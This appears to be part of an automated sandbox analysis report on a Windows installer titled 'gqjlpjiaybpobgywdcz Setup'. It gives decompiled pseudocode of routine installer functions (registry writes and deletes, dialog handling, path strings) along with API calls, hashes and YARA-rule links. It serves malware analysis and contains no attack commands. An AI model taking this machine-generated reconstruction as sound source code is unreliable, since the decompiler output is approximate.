                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                            • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                                                            • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                            • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}











                                                                                            0x00402337
                                                                                            0x0040233c
                                                                                            0x00402346
                                                                                            0x00402350
                                                                                            0x00402353
                                                                                            0x0040235d
                                                                                            0x0040236d
                                                                                            0x00402374
                                                                                            0x0040237c
                                                                                            0x0040238a
                                                                                            0x0040238e
                                                                                            0x00402399
                                                                                            0x00402399
                                                                                            0x0040239d
                                                                                            0x004023a1
                                                                                            0x004023a7
                                                                                            0x004023ac
                                                                                            0x004023ac
                                                                                            0x004023b0
                                                                                            0x004023bc
                                                                                            0x004023bc
                                                                                            0x004023d5
                                                                                            0x004023d7
                                                                                            0x004023d7
                                                                                            0x004023da
                                                                                            0x004024b0
                                                                                            0x004024b0
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv161C.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv161C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv161C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsv161C.tmp
                                                                                            • API String ID: 1356686001-313278241
                                                                                            • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                            • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                                                            • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                            • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 84%
                                                                                            			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}










                                                                                            0x00402a79
                                                                                            0x00402a8a
                                                                                            0x00402a92
                                                                                            0x00402aba
                                                                                            0x00402aa1
                                                                                            0x00402aa4
                                                                                            0x00402af4
                                                                                            0x00402afa
                                                                                            0x00402afc
                                                                                            0x00000000
                                                                                            0x00402afc
                                                                                            0x00402ab1
                                                                                            0x00402ab6
                                                                                            0x00402ab8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ab8
                                                                                            0x00402acf
                                                                                            0x00402ad7
                                                                                            0x00402ade
                                                                                            0x00402b04
                                                                                            0x00402b0a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402b12
                                                                                            0x00402b18
                                                                                            0x00402b1a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402b1a
                                                                                            0x00000000
                                                                                            0x00402aed
                                                                                            0x00402b01

                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1912718029-0
                                                                                            • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                            • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                                                            • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                            • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                            0x00401ce8
                                                                                            0x00401cef
                                                                                            0x00401d1e
                                                                                            0x00401d26
                                                                                            0x00401d2d
                                                                                            0x00401d2d
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00401CE2
                                                                                            • GetClientRect.USER32 ref: 00401CEF
                                                                                            • LoadImageA.USER32 ref: 00401D10
                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                            • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                                                            • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                            • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















                                                                                            0x0040467e
                                                                                            0x00404683
                                                                                            0x0040468b
                                                                                            0x0040468c
                                                                                            0x00404699
                                                                                            0x004046a1
                                                                                            0x004046a2
                                                                                            0x004046a4
                                                                                            0x004046a6
                                                                                            0x004046a8
                                                                                            0x004046ab
                                                                                            0x004046ab
                                                                                            0x004046b2
                                                                                            0x004046b8
                                                                                            0x004046b8
                                                                                            0x004046bf
                                                                                            0x004046c6
                                                                                            0x004046c9
                                                                                            0x004046cc
                                                                                            0x004046cc
                                                                                            0x004046d0
                                                                                            0x004046e0
                                                                                            0x004046e2
                                                                                            0x004046e5
                                                                                            0x0040468e
                                                                                            0x0040468e
                                                                                            0x00404695
                                                                                            0x00404695
                                                                                            0x004046ed
                                                                                            0x004046f8
                                                                                            0x0040470e
                                                                                            0x0040471e
                                                                                            0x0040473a

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                            • wsprintfA.USER32 ref: 0040471E
                                                                                            • SetDlgItemTextA.USER32 ref: 00404731
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                            • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                                                            • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                            • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 51%
                                                                                            			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                            0x00401bd3
                                                                                            0x00401bdf
                                                                                            0x00401be2
                                                                                            0x00401beb
                                                                                            0x00401beb
                                                                                            0x00401bee
                                                                                            0x00401bf2
                                                                                            0x00401bfb
                                                                                            0x00401bfb
                                                                                            0x00401bfe
                                                                                            0x00401c02
                                                                                            0x00401c04
                                                                                            0x00401c51
                                                                                            0x00401c53
                                                                                            0x00401c5c
                                                                                            0x00401c64
                                                                                            0x00401c67
                                                                                            0x00401c67
                                                                                            0x00401c70
                                                                                            0x00000000
                                                                                            0x00401c06
                                                                                            0x00401c0d
                                                                                            0x00401c0f
                                                                                            0x00401c17
                                                                                            0x00401c1a
                                                                                            0x00401c42
                                                                                            0x00401c76
                                                                                            0x00401c76
                                                                                            0x00401c1c
                                                                                            0x00401c2a
                                                                                            0x00401c32
                                                                                            0x00401c35
                                                                                            0x00401c35
                                                                                            0x00401c1a
                                                                                            0x00401c79
                                                                                            0x00401c7c
                                                                                            0x00401c82
                                                                                            0x00402866
                                                                                            0x00402866
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                            • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                                                            • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                            • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004038E3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x6dc460
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "gqjlpjiaybpobgywdcz Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x2
						_t27 =  *0x42ec48; // 0x6dc60c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x6dc624
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                            0x004038e7
                                                                                            0x004038ec
                                                                                            0x004038f2
                                                                                            0x004038f7
                                                                                            0x004038f7
                                                                                            0x004038ff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403901
                                                                                            0x00403907
                                                                                            0x0040390f
                                                                                            0x00403911
                                                                                            0x00403917
                                                                                            0x00403917
                                                                                            0x00403919
                                                                                            0x00403925
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403929
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040392b
                                                                                            0x00403930
                                                                                            0x00403939
                                                                                            0x0040393f
                                                                                            0x00403944
                                                                                            0x00403958
                                                                                            0x00403963
                                                                                            0x0040397b
                                                                                            0x00403981
                                                                                            0x00403986
                                                                                            0x0040398e
                                                                                            0x004039af
                                                                                            0x004039af
                                                                                            0x004039af
                                                                                            0x00403990
                                                                                            0x00403992
                                                                                            0x00403992
                                                                                            0x00403996
                                                                                            0x00403999
                                                                                            0x0040399d
                                                                                            0x0040399d
                                                                                            0x004039a2
                                                                                            0x004039a8
                                                                                            0x004039a8
                                                                                            0x00000000
                                                                                            0x00403992
                                                                                            0x00403946
                                                                                            0x0040394b
                                                                                            0x00403954
                                                                                            0x0040394d
                                                                                            0x0040394d
                                                                                            0x0040394d
                                                                                            0x0040394b

                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(00000000,gqjlpjiaybpobgywdcz Setup), ref: 0040397B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID: "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $1033$gqjlpjiaybpobgywdcz Setup
                                                                                            • API String ID: 530164218-654609469
                                                                                            • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                            • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                                                            • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                            • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                            0x004056bb
                                                                                            0x004056d2
                                                                                            0x004056da
                                                                                            0x004056da
                                                                                            0x004056e2

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                            • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-3916508600
                                                                                            • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                            • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                                                            • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                            • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                                                            Uniqueness

